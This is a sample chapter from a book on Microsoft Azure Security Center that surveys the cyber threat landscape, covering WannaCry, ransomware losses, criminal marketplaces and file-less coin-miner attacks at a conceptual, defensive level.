The threat landscape

In this sample chapter from Microsoft Azure Security Center, 2nd Edition, authors Yuri Diogenes and Tom Shinder discuss cybercrime, the motivation of hackers, and how you can detect and prevent attacks.

On May 12, 2017, the mainstream media began covering a massive ransomware attack called WannaCry, which caught the world by surprise. It was reported that in a single day, 230,000 computers in more than 150 countries were infected. The attack was carried out by exploiting computers on which the MS17-010 patch—released in March 2017 to fix a Microsoft SMB vulnerability—had not been applied. In addition to affecting home users, this attack hit organizations such as the United Kingdom’s National Health Service (NHS). Computers that were patched were not affected. (This, of course, highlights the need to have a solid update-management process in place!)

Ransomware like WannaCry—or like Petya, which allows for lateral movement, meaning it takes only a single infected machine to potentially bring down the entire network—is just one threat in the current landscape. There are many others. Before we dive into Azure Security Center, you need a good understanding of current threats and the motivations of the people behind them. Current threats range from old but effective techniques, such as phishing emails, to state-sponsored attacks, and everything in between. For example, one common threat is drive-by download sites. Another is Trojans. Then there is the weaponization of cloud resources to attack on-premises assets. This chapter explores several of these threats to prepare you to use Azure Security Center. But first, it discusses cybercrime and the cyber kill chain, establishing your security posture, and the assume-breach approach.

Understanding cybercrime

The days of hacking for status are behind us. Nowadays, a main motivator behind cyberattacks is some sort of financial gain.

The Internet Crime Complaint Center (IC3) is part of the Cyber Division of the US Federal Bureau of Investigation. According to its 2017 Internet Crime Report (, the IC3 received 1,783 complaints related to ransomware, resulting in losses of more than $2.3 million. Tech-support fraud also left a mark, with a total of $15 million in losses in 2017. Finally, the total financial loss in the United States exceeded $1.42 billion in 2017.

You’re probably wondering how cybercriminals monetize the data they steal. That’s a great question. Many of these cybercriminals work in organized crime, and they have a globally distributed criminal infrastructure, which is used to launch attacks. Before they launch an attack, they start a new attack campaign. To build that campaign, they work with technically sophisticated organized crime groups, which they find on the cybercriminal marketplace online.

These technical cybercriminals have different online offerings. For example, they might offer counter-antivirus (CAV) services, which scan antivirus engines to make sure new malware can be successfully deployed without being detected. Another offering could be bulletproof hosting services for online criminal activity. (They’re called “bulletproof” because the owners of these servers do not cooperate with local law enforcement in case of an investigation.) There are even escrow services that act as a third party in online transactions between technical criminals and their criminal clients.

Throughout 2017 and 2018, cybercriminals realized the opportunity to make money with cryptocurrencies by customizing coin miners for malicious intents. This is done by running a malware campaign that deploys and runs the Trojanized miners in victims’ computers. In order for cryptocurrency miners to work properly and be more profitable, attackers must keep persistence in the target system. The longer cryptocurrency miners stay undetected and resident in memory, the longer they can steal resources.

To accomplish this goal, cybercriminals use advanced methods of code injection, such as file-less techniques. This attack usually leverages tools that are already in the target system, such as PowerShell. By leveraging a tool that is already on the computer, they don’t need to write to the hard drive; instead, they only need to take over the target process, run a piece of code in its memory space, and then use that code to call the tool that will be used to perform the attack. The question here is: Do you have detections for that? Azure Security Center does!